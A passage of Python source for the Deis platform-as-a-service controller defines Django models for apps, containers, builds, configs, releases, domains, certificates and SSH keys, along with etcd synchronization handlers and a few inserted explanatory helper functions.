base64.b64decode(value.split()[1])
except Exception as e:
raise ValidationError(e)
def validate_id_is_docker_compatible(value):
"""
Check that the ID follows docker's image name constraints
"""
match = re.match(r'^[a-z0-9-]+$', value)
if not match:
raise ValidationError("App IDs can only contain [a-z0-9-].")
def validate_app_structure(value):
"""Error if the dict values aren't ints >= 0."""
try:
if any(int(v) < 0 for v in value.viewvalues()):
raise ValueError("Must be greater than or equal to zero")
except ValueError as err:
raise ValidationError(err)
def validate_reserved_names(value):
"""A value cannot use some reserved names."""
if value in settings.DEIS_RESERVED_NAMES:
raise ValidationError('{} is a reserved name.'.format(value))
def validate_comma_separated(value):
"""Error if the value doesn't look like a list of hostnames or IP addresses
separated by commas.
"""
if not re.search(r'^[a-zA-Z0-9-,\.]+$', value):
raise ValidationError(
"{} should be a comma-separated list".format(value))
def validate_domain(value):
"""Error if the domain contains unexpected characters."""
if not re.search(r'^[a-zA-Z0-9-\.]+$', value):
raise ValidationError('"{}" contains unexpected characters'.format(value))
def validate_certificate(value):
try:
crypto.load_certificate(crypto.FILETYPE_PEM, value)
except crypto.Error as e:
raise ValidationError('Could not load certificate: {}'.format(e))
def validate_common_name(value):
if '*' in value:
raise ValidationError('Wildcard certificates are not supported')
def get_etcd_client():
if not hasattr(get_etcd_client, "client"):
# wire up etcd publishing if we can connect
try:
get_etcd_client.client = etcd.Client(
host=settings.ETCD_HOST,
port=int(settings.ETCD_PORT))
get_etcd_client.client.get('/deis')
except etcd.EtcdException:
logger.log(logging.WARNING, 'Cannot synchronize with etcd cluster')
get_etcd_client.client = None
return get_etcd_client.client
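# Aside (illustrative): get_etcd_client() above memoizes its result as an attribute on the
# function object, so the etcd connection is attempted at most once per process. The same
# pattern in its generic form (names here are examples only):
def _memoized_resource():
    if not hasattr(_memoized_resource, "cached"):
        _memoized_resource.cached = object()  # stand-in for an expensive client/connection
    return _memoized_resource.cached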
class AuditedModel(models.Model):
"""Add created and updated fields to a model."""
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
"""Mark :class:`AuditedModel` as abstract."""
abstract = True
def select_app_name():
"""Select a unique randomly generated app name"""
name = utils.generate_app_name()
while App.objects.filter(id=name).exists():
name = utils.generate_app_name()
return name
class UuidAuditedModel(AuditedModel):
"""Add a UUID primary key to an :class:`AuditedModel`."""
uuid = fields.UuidField('UUID', primary_key=True)
class Meta:
"""Mark :class:`UuidAuditedModel` as abstract."""
abstract = True
@python_2_unicode_compatible
class App(UuidAuditedModel):
"""
Application used to service requests on behalf of end-users
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.SlugField(max_length=64, unique=True, default=select_app_name,
validators=[validate_id_is_docker_compatible,
validate_reserved_names])
structure = JSONField(default={}, blank=True, validators=[validate_app_structure])
class Meta:
permissions = (('use_app', 'Can use app'),)
@property
def _scheduler(self):
mod = importlib.import_module(settings.SCHEDULER_MODULE)
return mod.SchedulerClient(settings.SCHEDULER_TARGET,
settings.SCHEDULER_AUTH,
settings.SCHEDULER_OPTIONS,
settings.SSH_PRIVATE_KEY)
def __str__(self):
return self.id
@property
def url(self):
return self.id + '.' + settings.DEIS_DOMAIN
def _get_job_id(self, container_type):
app = self.id
release = self.release_set.latest()
version = "v{}".format(release.version)
job_id = "{app}_{version}.{container_type}".format(**locals())
return job_id
def _get_command(self, container_type):
try:
# if this is not a procfile-based app, ensure they cannot break out
# and run arbitrary commands on the host
# FIXME: remove slugrunner's hardcoded entrypoint
release = self.release_set.latest()
if release.build.dockerfile or not release.build.sha:
return "bash -c '{}'".format(release.build.procfile[container_type])
else:
return 'start {}'.format(container_type)
# if the key is not present or if a parent attribute is None
except (KeyError, TypeError, AttributeError):
# handle special case for Dockerfile deployments
return '' if container_type == 'cmd' else 'start {}'.format(container_type)
def log(self, message, level=logging.INFO):
"""Logs a message in the context of this application.
This prefixes log messages with an application "tag" that the customized deis-logspout will
be on the lookout for. When it's seen, the message (usually an application event of some
sort, like releasing or scaling) will be considered as "belonging" to the application
instead of the controller and will be handled accordingly.
"""
logger.log(level, "[{}]: {}".format(self.id, message))
def create(self, *args, **kwargs):
"""Create a new application with an initial config and release"""
config = Config.objects.create(owner=self.owner, app=self)
Release.objects.create(version=1, owner=self.owner, app=self, config=config, build=None)
def delete(self, *args, **kwargs):
"""Delete this application including all containers"""
try:
# attempt to remove containers from the scheduler
self._destroy_containers([c for c in self.container_set.exclude(type='run')])
except RuntimeError:
pass
self._clean_app_logs()
return super(App, self).delete(*args, **kwargs)
def restart(self, **kwargs):
to_restart = self.container_set.all()
if kwargs.get('type'):
to_restart = to_restart.filter(type=kwargs.get('type'))
if kwargs.get('num'):
to_restart = to_restart.filter(num=kwargs.get('num'))
self._restart_containers(to_restart)
return to_restart
def _clean_app_logs(self):
"""Delete application logs stored by the logger component"""
try:
url = 'http://{}:{}/{}/'.format(settings.LOGGER_HOST, settings.LOGGER_PORT, self.id)
requests.delete(url)
except Exception as e:
# Ignore errors deleting application logs. An error here should not interfere with
# the overall success of deleting an application, but we should log it.
err = 'Error deleting existing application logs: {}'.format(e)
log_event(self, err, logging.WARNING)
def scale(self, user, structure): # noqa
"""Scale containers up or down to match requested structure."""
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release')
requested_structure = structure.copy()
release = self.release_set.latest()
# test for available process types
available_process_types = release.build.procfile or {}
for container_type in requested_structure:
if container_type == 'cmd':
continue # allow docker cmd types in case we don't have the image source
if container_type not in available_process_types:
raise EnvironmentError(
'Container type {} does not exist in application'.format(container_type))
msg = '{} scaled containers '.format(user.username) + ' '.join(
"{}={}".format(k, v) for k, v in requested_structure.items())
log_event(self, msg)
# iterate and scale by container type (web, worker, etc)
changed = False
to_add, to_remove = [], []
scale_types = {}
# iterate on a copy of the container_type keys
for container_type in requested_structure.keys():
containers = list(self.container_set.filter(type=container_type).order_by('created'))
# increment new container nums off the most recent container
results = self.container_set.filter(type=container_type).aggregate(Max('num'))
container_num = (results.get('num__max') or 0) + 1
requested = requested_structure.pop(container_type)
diff = requested - len(containers)
if diff == 0:
continue
changed = True
scale_types[container_type] = requested
while diff < 0:
c = containers.pop()
to_remove.append(c)
diff += 1
while diff > 0:
# create a database record
c = Container.objects.create(owner=self.owner,
app=self,
release=release,
type=container_type,
num=container_num)
to_add.append(c)
container_num += 1
diff -= 1
if changed:
if "scale" in dir(self._scheduler):
self._scale_containers(scale_types, to_remove)
else:
if to_add:
self._start_containers(to_add)
if to_remove:
self._destroy_containers(to_remove)
# save new structure to the database
vals = self.container_set.exclude(type='run').values(
'type').annotate(Count('pk')).order_by()
new_structure = structure.copy()
new_structure.update({v['type']: v['pk__count'] for v in vals})
self.structure = new_structure
self.save()
return changed
def _scale_containers(self, scale_types, to_remove):
release = self.release_set.latest()
for scale_type in scale_types:
image = release.image
version = "v{}".format(release.version)
kwargs = {'memory': release.config.memory,
'cpu': release.config.cpu,
'tags': release.config.tags,
'version': version,
'aname': self.id,
'num': scale_types[scale_type]}
job_id = self._get_job_id(scale_type)
command = self._get_command(scale_type)
try:
self._scheduler.scale(
name=job_id,
image=image,
command=command,
**kwargs)
except Exception as e:
err = '{} (scale): {}'.format(job_id, e)
log_event(self, err, logging.ERROR)
raise
[c.delete() for c in to_remove]
def _start_containers(self, to_add):
"""Creates and starts containers via the scheduler"""
if not to_add:
return
create_threads = [Thread(target=c.create) for c in to_add]
start_threads = [Thread(target=c.start) for c in to_add]
[t.start() for t in create_threads]
[t.join() for t in create_threads]
if any(c.state != 'created' for c in to_add):
err = 'aborting, failed to create some containers'
log_event(self, err, logging.ERROR)
self._destroy_containers(to_add)
raise RuntimeError(err)
[t.start() for t in start_threads]
[t.join() for t in start_threads]
if set([c.state for c in to_add]) != set(['up']):
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
# if the user specified a health check, try checking to see if it's running
try:
config = self.config_set.latest()
if 'HEALTHCHECK_URL' in config.values.keys():
self._healthcheck(to_add, config.values)
except Config.DoesNotExist:
pass
def _healthcheck(self, containers, config):
# if at first it fails, back off and try again at 10%, 50% and 100% of INITIAL_DELAY
intervals = [1.0, 0.1, 0.5, 1.0]
# HACK (bacongobbler): we need to wait until publisher has a chance to publish each
# service to etcd, which can take up to 20 seconds.
time.sleep(20)
for i in xrange(len(intervals)):
delay = int(config.get('HEALTHCHECK_INITIAL_DELAY', 0))
try:
# sleep until the initial timeout is over
if delay > 0:
time.sleep(delay * intervals[i])
to_healthcheck = [c for c in containers if c.type in ['web', 'cmd']]
self._do_healthcheck(to_healthcheck, config)
break
except exceptions.HealthcheckException as e:
try:
next_delay = delay * intervals[i+1]
msg = "{}; trying again in {} seconds".format(e, next_delay)
log_event(self, msg, logging.WARNING)
except IndexError:
log_event(self, e, logging.WARNING)
else:
self._destroy_containers(containers)
msg = "aborting, app containers failed to respond to health check"
log_event(self, msg, logging.ERROR)
raise RuntimeError(msg)
def _do_healthcheck(self, containers, config):
path = config.get('HEALTHCHECK_URL', '/')
timeout = int(config.get('HEALTHCHECK_TIMEOUT', 1))
if not _etcd_client:
raise exceptions.HealthcheckException('no etcd client available')
for container in containers:
try:
key = "/deis/services/{self}/{container.job_id}".format(**locals())
url = "http://{}{}".format(_etcd_client.get(key).value, path)
response = requests.get(url, timeout=timeout)
if response.status_code != requests.codes.OK:
raise exceptions.HealthcheckException(
"app failed health check (got '{}', expected: '200')".format(
response.status_code))
except (requests.Timeout, requests.ConnectionError, KeyError) as e:
raise exceptions.HealthcheckException(
'failed to connect to container ({})'.format(e))
def _restart_containers(self, to_restart):
"""Restarts containers via the scheduler"""
if not to_restart:
return
stop_threads = [Thread(target=c.stop) for c in to_restart]
start_threads = [Thread(target=c.start) for c in to_restart]
[t.start() for t in stop_threads]
[t.join() for t in stop_threads]
if any(c.state != 'created' for c in to_restart):
err = 'warning, some containers failed to stop'
log_event(self, err, logging.WARNING)
[t.start() for t in start_threads]
[t.join() for t in start_threads]
if any(c.state != 'up' for c in to_restart):
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
def _destroy_containers(self, to_destroy):
"""Destroys containers via the scheduler"""
if not to_destroy:
return
destroy_threads = [Thread(target=c.destroy) for c in to_destroy]
[t.start() for t in destroy_threads]
[t.join() for t in destroy_threads]
pks = [c.pk for c in to_destroy if c.state == 'destroyed']
Container.objects.filter(pk__in=pks).delete()
if any(c.state != 'destroyed' for c in to_destroy):
err = 'aborting, failed to destroy some containers'
log_event(self, err, logging.ERROR)
raise RuntimeError(err)
def deploy(self, user, release):
"""Deploy a new release to this application"""
existing = self.container_set.exclude(type='run')
new = []
scale_types = set()
for e in existing:
n = e.clone(release)
n.save()
new.append(n)
scale_types.add(e.type)
if new and "deploy" in dir(self._scheduler):
self._deploy_app(scale_types, release, existing)
else:
self._start_containers(new)
# destroy old containers
if existing:
self._destroy_containers(existing)
# perform default scaling if necessary
if self.structure == {} and release.build is not None:
self._default_scale(user, release)
def _deploy_app(self, scale_types, release, existing):
for scale_type in scale_types:
image = release.image
version = "v{}".format(release.version)
kwargs = {'memory': release.config.memory,
'cpu': release.config.cpu,
'tags': release.config.tags,
'aname': self.id,
'num': 0,
'version': version}
job_id = self._get_job_id(scale_type)
command = self._get_command(scale_type)
try:
self._scheduler.deploy(
name=job_id,
image=image,
command=command,
**kwargs)
except Exception as e:
err = '{} (deploy): {}'.format(job_id, e)
log_event(self, err, logging.ERROR)
raise
[c.delete() for c in existing]
def _default_scale(self, user, release):
"""Scale to default structure based on release type"""
# if there is no SHA, assume a docker image is being promoted
if not release.build.sha:
structure = {'cmd': 1}
# if a dockerfile exists without a procfile, assume docker workflow
elif release.build.dockerfile and not release.build.procfile:
structure = {'cmd': 1}
# if a procfile exists without a web entry, assume docker workflow
elif release.build.procfile and 'web' not in release.build.procfile:
structure = {'cmd': 1}
# default to heroku workflow
else:
structure = {'web': 1}
self.scale(user, structure)
def logs(self, log_lines=str(settings.LOG_LINES)):
"""Return aggregated log data for this application."""
try:
url = "http://{}:{}/{}?log_lines={}".format(settings.LOGGER_HOST, settings.LOGGER_PORT,
self.id, log_lines)
r = requests.get(url)
# Handle HTTP request errors
except requests.exceptions.RequestException as e:
logger.error("Error accessing deis-logger using url '{}': {}".format(url, e))
raise e
# Handle logs empty or not found
if r.status_code == 204 or r.status_code == 404:
logger.info("GET {} returned a {} status code".format(url, r.status_code))
raise EnvironmentError('Could not locate logs')
# Handle unanticipated status codes
if r.status_code != 200:
logger.error("Error accessing deis-logger: GET {} returned a {} status code"
.format(url, r.status_code))
raise EnvironmentError('Error accessing deis-logger')
return r.content
def run(self, user, command):
"""Run a one-off command in an ephemeral app container."""
# FIXME: remove the need for SSH private keys by using
# a scheduler that supports one-off admin tasks natively
if not settings.SSH_PRIVATE_KEY:
raise EnvironmentError('Support for admin commands is not configured')
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release to run this command')
# TODO: add support for interactive shell
msg = "{} runs '{}'".format(user.username, command)
log_event(self, msg)
c_num = max([c.num for c in self.container_set.filter(type='run')] or [0]) + 1
# create database record for run process
c = Container.objects.create(owner=self.owner,
app=self,
release=self.release_set.latest(),
type='run',
num=c_num)
image = c.release.image
# check for backwards compatibility
def _has_hostname(image):
repo, tag = dockerutils.parse_repository_tag(image)
return True if '/' in repo and '.' in repo.split('/')[0] else False
if not _has_hostname(image):
image = '{}:{}/{}'.format(settings.REGISTRY_HOST,
settings.REGISTRY_PORT,
image)
# SECURITY: shell-escape user input
escaped_command = command.replace("'", "'\\''")
return c.run(escaped_command)
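# Aside (illustrative, plain dicts instead of ORM objects): the core of App.scale() above is a
# per-type diff between the requested structure and the containers that already exist. A
# stripped-down version of that bookkeeping, with names chosen for the example only:
def _scale_diff(requested, running):
    """requested: {type: count}; running: {type: [container_nums]} -> (to_add, to_remove)."""
    to_add, to_remove = {}, {}
    for ctype, want in requested.items():
        have = list(running.get(ctype, []))
        diff = want - len(have)
        if diff > 0:
            next_num = (max(have) if have else 0) + 1  # number new containers past the highest
            to_add[ctype] = list(range(next_num, next_num + diff))
        elif diff < 0:
            # scale() pops from the end of the created-ordered list, i.e. newest first
            to_remove[ctype] = have[diff:]
    return to_add, to_remove
# _scale_diff({'web': 3, 'worker': 1}, {'web': [1], 'worker': [1, 2]})
#   -> ({'web': [2, 3]}, {'worker': [2]})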
@python_2_unicode_compatible
class Container(UuidAuditedModel):
"""
Docker container used to securely host an application process.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
release = models.ForeignKey('Release')
type = models.CharField(max_length=128, blank=False)
num = models.PositiveIntegerField()
@property
def _scheduler(self):
return self.app._scheduler
@property
def state(self):
return self._scheduler.state(self.job_id).name
def short_name(self):
return "{}.{}.{}".format(self.app.id, self.type, self.num)
short_name.short_description = 'Name'
def __str__(self):
return self.short_name()
class Meta:
get_latest_by = '-created'
ordering = ['created']
@property
def job_id(self):
version = "v{}".format(self.release.version)
return "{self.app.id}_{version}.{self.type}.{self.num}".format(**locals())
def _get_command(self):
try:
# if this is not a procfile-based app, ensure they cannot break out
# and run arbitrary commands on the host
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.dockerfile or not self.release.build.sha:
return "bash -c '{}'".format(self.release.build.procfile[self.type])
else:
return 'start {}'.format(self.type)
# if the key is not present or if a parent attribute is None
except (KeyError, TypeError, AttributeError):
# handle special case for Dockerfile deployments
return '' if self.type == 'cmd' else 'start {}'.format(self.type)
_command = property(_get_command)
def clone(self, release):
c = Container.objects.create(owner=self.owner,
app=self.app,
release=release,
type=self.type,
num=self.num)
return c
@close_db_connections
def create(self):
image = self.release.image
kwargs = {'memory': self.release.config.memory,
'cpu': self.release.config.cpu,
'tags': self.release.config.tags}
try:
self._scheduler.create(
name=self.job_id,
image=image,
command=self._command,
**kwargs)
except Exception as e:
err = '{} (create): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@close_db_connections
def start(self):
try:
self._scheduler.start(self.job_id)
except Exception as e:
err = '{} (start): {}'.format(self.job_id, e)
log_event(self.app, err, logging.WARNING)
raise
@close_db_connections
def stop(self):
try:
self._scheduler.stop(self.job_id)
except Exception as e:
err = '{} (stop): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@close_db_connections
def destroy(self):
try:
self._scheduler.destroy(self.job_id)
except Exception as e:
err = '{} (destroy): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
def run(self, command):
"""Run a one-off command"""
if self.release.build is None:
raise EnvironmentError('No build associated with this release '
'to run this command')
image = self.release.image
entrypoint = '/bin/bash'
# if this is a procfile-based app, switch the entrypoint to slugrunner's default
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.procfile and \
self.release.build.sha and not \
self.release.build.dockerfile:
entrypoint = '/runner/init'
command = "'{}'".format(command)
else:
command = "-c '{}'".format(command)
try:
rc, output = self._scheduler.run(self.job_id, image, entrypoint, command)
return rc, output
except Exception as e:
err = '{} (run): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@python_2_unicode_compatible
class Push(UuidAuditedModel):
"""
Instance of a push used to trigger an application build
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
sha = models.CharField(max_length=40)
fingerprint = models.CharField(max_length=255)
receive_user = models.CharField(max_length=255)
receive_repo = models.CharField(max_length=255)
ssh_connection = models.CharField(max_length=255)
ssh_original_command = models.CharField(max_length=255)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{0}-{1}".format(self.app.id, self.sha[:7])
@python_2_unicode_compatible
class Build(UuidAuditedModel):
"""
Instance of a software build used by runtime nodes
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
image = models.CharField(max_length=256)
# optional fields populated by builder
sha = models.CharField(max_length=40, blank=True)
procfile = JSONField(default={}, blank=True)
dockerfile = models.TextField(blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def create(self, user, *args, **kwargs):
latest_release = self.app.release_set.latest()
source_version = 'latest'
if self.sha:
source_version = 'git-{}'.format(self.sha)
new_release = latest_release.new(user,
build=self,
config=latest_release.config,
source_version=source_version)
try:
self.app.deploy(user, new_release)
return new_release
except RuntimeError:
new_release.delete()
raise
def save(self, **kwargs):
try:
previous_build = self.app.build_set.latest()
to_destroy = []
for proctype in previous_build.procfile:
if proctype not in self.procfile:
for c in self.app.container_set.filter(type=proctype):
to_destroy.append(c)
self.app._destroy_containers(to_destroy)
except Build.DoesNotExist:
pass
return super(Build, self).save(**kwargs)
def __str__(self):
return "{0}-{1}".format(self.app.id, self.uuid[:7])
@python_2_unicode_compatible
class Config(UuidAuditedModel):
"""
Set of configuration values applied as environment variables
during runtime execution of the Application.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
values = JSONField(default={}, blank=True)
memory = JSONField(default={}, blank=True)
cpu = JSONField(default={}, blank=True)
tags = JSONField(default={}, blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{}-{}".format(self.app.id, self.uuid[:7])
def save(self, **kwargs):
"""merge the old config with the new"""
try:
previous_config = self.app.config_set.latest()
for attr in ['cpu', 'memory', 'tags', 'values']:
# Guard against migrations from older apps without fixes to
# JSONField encoding.
try:
data = getattr(previous_config, attr).copy()
except AttributeError:
data = {}
try:
new_data = getattr(self, attr).copy()
except AttributeError:
new_data = {}
data.update(new_data)
# remove config keys if we provided a null value
[data.pop(k) for k, v in new_data.viewitems() if v is None]
setattr(self, attr, data)
except Config.DoesNotExist:
pass
return super(Config, self).save(**kwargs)
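# Aside (illustrative, plain dicts): the merge rule implemented in Config.save() above is
# "new values override old ones, and an explicit None unsets the key". In isolation:
def _merge_config(old, new):
    merged = dict(old)
    merged.update(new)
    for key, val in new.items():
        if val is None:
            merged.pop(key, None)  # a null value removes the key entirely
    return merged
# _merge_config({'A': '1', 'B': '2'}, {'B': None, 'C': '3'})  ->  {'A': '1', 'C': '3'}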
@python_2_unicode_compatible
class Release(UuidAuditedModel):
"""
Software release deployed by the application platform
Releases contain a :class:`Build` and a :class:`Config`.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
version = models.PositiveIntegerField()
summary = models.TextField(blank=True, null=True)
config = models.ForeignKey('Config')
build = models.ForeignKey('Build', null=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'version'),)
def __str__(self):
return "{0}-v{1}".format(self.app.id, self.version)
@property
def image(self):
return '{}:v{}'.format(self.app.id, str(self.version))
def new(self, user, config, build, summary=None, source_version='latest'):
"""
Create a new application release using the provided Build and Config
on behalf of a user.
Releases start at v1 and auto-increment.
"""
# auto-increment the release version
new_version = self.version + 1
# create the new release record
release = Release.objects.create(
owner=user, app=self.app, config=config,
build=build, version=new_version, summary=summary)
try:
release.publish()
except EnvironmentError as e:
# If we cannot publish this app, just log and carry on
log_event(self.app, e)
pass
return release
def publish(self, source_version='latest'):
if self.build is None:
raise EnvironmentError('No build associated with this release to publish')
source_image = self.build.image
if ':' not in source_image:
source_tag = 'git-{}'.format(self.build.sha) if self.build.sha else source_version
source_image = "{}:{}".format(source_image, source_tag)
# If the build has a SHA, assume it's from deis-builder and in the deis-registry already
deis_registry = bool(self.build.sha)
publish_release(source_image, self.config.values, self.image, deis_registry)
def previous(self):
"""
Return the previous Release to this one.
:return: the previous :class:`Release`, or None
"""
releases = self.app.release_set
if self.pk:
releases = releases.exclude(pk=self.pk)
try:
# Get the Release previous to this one
prev_release = releases.latest()
except Release.DoesNotExist:
prev_release = None
return prev_release
def rollback(self, user, version):
if version < 1:
raise EnvironmentError('version cannot be below 1')
summary = "{} rolled back to v{}".format(user, version)
prev = self.app.release_set.get(version=version)
new_release = self.new(
user,
build=prev.build,
config=prev.config,
summary=summary,
source_version='v{}'.format(version))
try:
self.app.deploy(user, new_release)
return new_release
except RuntimeError:
new_release.delete()
raise
def save(self, *args, **kwargs): # noqa
if not self.summary:
self.summary = ''
prev_release = self.previous()
# compare this build to the previous build
old_build = prev_release.build if prev_release else None
old_config = prev_release.config if prev_release else None
# if the build changed, log it and who pushed it
if self.version == 1:
self.summary += "{} created initial release".format(self.app.owner)
elif self.build != old_build:
if self.build.sha:
self.summary += "{} deployed {}".format(self.build.owner, self.build.sha[:7])
else:
self.summary += "{} deployed {}".format(self.build.owner, self.build.image)
# if the config data changed, log the dict diff
if self.config != old_config:
dict1 = self.config.values
dict2 = old_config.values if old_config else {}
diff = dict_diff(dict1, dict2)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added ' + added if added else ''
changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
# if the limits changed (memory or cpu), log the dict diff
changes = []
old_mem = old_config.memory if old_config else {}
diff = dict_diff(self.config.memory, old_mem)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('memory')
old_cpu = old_config.cpu if old_config else {}
diff = dict_diff(self.config.cpu, old_cpu)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('cpu')
if changes:
changes = 'changed limits for '+', '.join(changes)
self.summary += "{} {}".format(self.config.owner, changes)
# if the tags changed, log the dict diff
changes = []
old_tags = old_config.tags if old_config else {}
diff = dict_diff(self.config.tags, old_tags)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added tag ' + added if added else ''
changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed tag ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted tag ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
if not self.summary:
if self.version == 1:
self.summary = "{} created the initial release".format(self.owner)
else:
self.summary = "{} changed nothing".format(self.owner)
super(Release, self).save(*args, **kwargs)
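# Aside: Release.save() above relies on dict_diff() from utils and reads three buckets from
# its result ('added', 'changed', 'deleted'). The sketch below only illustrates that assumed
# shape so the summary-building logic is easier to follow; it is NOT the actual
# utils.dict_diff implementation.
def _dict_diff_sketch(new, old):
    return {
        'added': {k: new[k] for k in new if k not in old},
        'changed': {k: new[k] for k in new if k in old and new[k] != old[k]},
        'deleted': {k: old[k] for k in old if k not in new},
    }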
@python_2_unicode_compatible
class Domain(AuditedModel):
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
domain = models.TextField(blank=False, null=False, unique=True)
def __str__(self):
return self.domain
@python_2_unicode_compatible
class Certificate(AuditedModel):
"""
Public and private key pair used to secure application traffic at the router.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
# there is no upper limit on the size of an x.509 certificate
certificate = models.TextField(validators=[validate_certificate])
key = models.TextField()
# X.509 certificates allow any string of information as the common name.
common_name = models.TextField(unique=True, validators=[validate_common_name])
expires = models.DateTimeField()
def __str__(self):
return self.common_name
def _get_certificate(self):
try:
return crypto.load_certificate(crypto.FILETYPE_PEM, self.certificate)
except crypto.Error as e:
raise SuspiciousOperation(e)
def save(self, *args, **kwargs):
certificate = self._get_certificate()
if not self.common_name:
self.common_name = certificate.get_subject().CN
if not self.expires:
# convert openssl's expiry date format to Django's DateTimeField format
self.expires = datetime.strptime(certificate.get_notAfter(), '%Y%m%d%H%M%SZ')
return super(Certificate, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Key(UuidAuditedModel):
"""An SSH public key."""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.CharField(max_length=128)
public = models.TextField(unique=True, validators=[validate_base64])
fingerprint = models.CharField(max_length=128)
class Meta:
verbose_name = 'SSH Key'
unique_together = (('owner', 'fingerprint'),)
def __str__(self):
return "{}...{}".format(self.public[:18], self.public[-31:])
def save(self, *args, **kwargs):
self.fingerprint = fingerprint(self.public)
return super(Key, self).save(*args, **kwargs)
# define update/delete callbacks for synchronizing
# models with the configuration management backend
def _log_build_created(**kwargs):
if kwargs.get('created'):
build = kwargs['instance']
# log only to the controller; this event will be logged in the release summary
logger.info("{}: build {} created".format(build.app, build))
def _log_release_created(**kwargs):
if kwargs.get('created'):
release = kwargs['instance']
# log only to the controller; this event will be logged in the release summary
logger.info("{}: release {} created".format(release.app, release))
# append release lifecycle logs to the app
release.app.log(release.summary)
def _log_config_updated(**kwargs):
config = kwargs['instance']
# log only to the controller; this event will be logged in the release summary
logger.info("{}: config {} updated".format(config.app, config))
def _log_domain_added(**kwargs):
if kwargs.get('created'):
domain = kwargs['instance']
msg = "domain {} added".format(domain)
log_event(domain.app, msg)
def _log_domain_removed(**kwargs):
domain = kwargs['instance']
msg = "domain {} removed".format(domain)
log_event(domain.app, msg)
def _log_cert_added(**kwargs):
if kwargs.get('created'):
cert = kwargs['instance']
logger.info("cert {} added".format(cert))
def _log_cert_removed(**kwargs):
cert = kwargs['instance']
logger.info("cert {} removed".format(cert))
def _etcd_publish_key(**kwargs):
key = kwargs['instance']
_etcd_client.write('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)), key.public)
def _etcd_purge_key(**kwargs):
key = kwargs['instance']
try:
_etcd_client.delete('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)))
except KeyError:
pass
def _etcd_purge_user(**kwargs):
username = kwargs['instance'].username
try:
_etcd_client.delete(
'/deis/builder/users/{}'.format(username), dir=True, recursive=True)
except KeyError:
# If _etcd_publish_key() wasn't called, there is no user dir to delete.
pass
def _etcd_publish_app(**kwargs):
appname = kwargs['instance']
try:
_etcd_client.write('/deis/services/{}'.format(appname), None, dir=True)
except KeyError:
# Ignore error when the directory already exists.
pass
def _etcd_purge_app(**kwargs):
appname = kwargs['instance']
try:
_etcd_client.delete('/deis/services/{}'.format(appname), dir=True, recursive=True)
except KeyError:
pass
def _etcd_publish_cert(**kwargs):
cert = kwargs['instance']
_etcd_client.write('/deis/certs/{}/cert'.format(cert), cert.certificate)
_etcd_client.write('/deis/certs/{}/key'.format(cert), cert.key)
def _etcd_purge_cert(**kwargs):
cert = kwargs['instance']
try:
_etcd_client.delete('/deis/certs/{}'.format(cert),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
def _etcd_publish_config(**kwargs):
config = kwargs['instance']
# we purge all existing config when adding the newest instance. This is because
# deis config:unset would remove an existing value, but not delete the
# old config object
try:
_etcd_client.delete('/deis/config/{}'.format(config.app),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
for k, v in config.values.iteritems():
_etcd_client.write(
'/deis/config/{}/{}'.format(
config.app,
unicode(k).encode('utf-8').lower()),
unicode(v).encode('utf-8'))
def _etcd_purge_config(**kwargs):
config = kwargs['instance']
try:
_etcd_client.delete('/deis/config/{}'.format(config.app),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
def _etcd_publish_domains(**kwargs):
domain = kwargs['instance']
_etcd_client.write('/deis/domains/{}'.format(domain), domain.app)
def _etcd_purge_domains(**kwargs):
domain = kwargs['instance']
try:
_etcd_client.delete('/deis/domains/{}'.format(domain),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
# Log significant app-related events
post_save.connect(_log_build_created, sender=Build, dispatch_uid='api.models.log')
post_save.connect(_log_release_created, sender=Release, dispatch_uid='api.models.log')
